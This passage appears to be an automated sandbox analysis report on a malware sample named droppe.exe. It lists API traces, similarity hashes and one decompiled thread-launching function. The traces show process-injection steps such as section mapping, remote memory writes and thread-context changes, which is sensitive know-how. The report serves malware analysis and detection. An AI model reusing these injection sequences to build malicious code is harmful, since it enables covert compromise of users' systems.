    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:A8B931811E8A8BDB83E0AFF2E1C6E560
Total matches:37
Initial sample Analysis ID:67025
Initial sample SHA 256:05F1BC8B6F82269B0EB8BF91AE796EC45FA481C27934244A4C7177CDF1E6123E
Initial sample name:droppe.exe

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
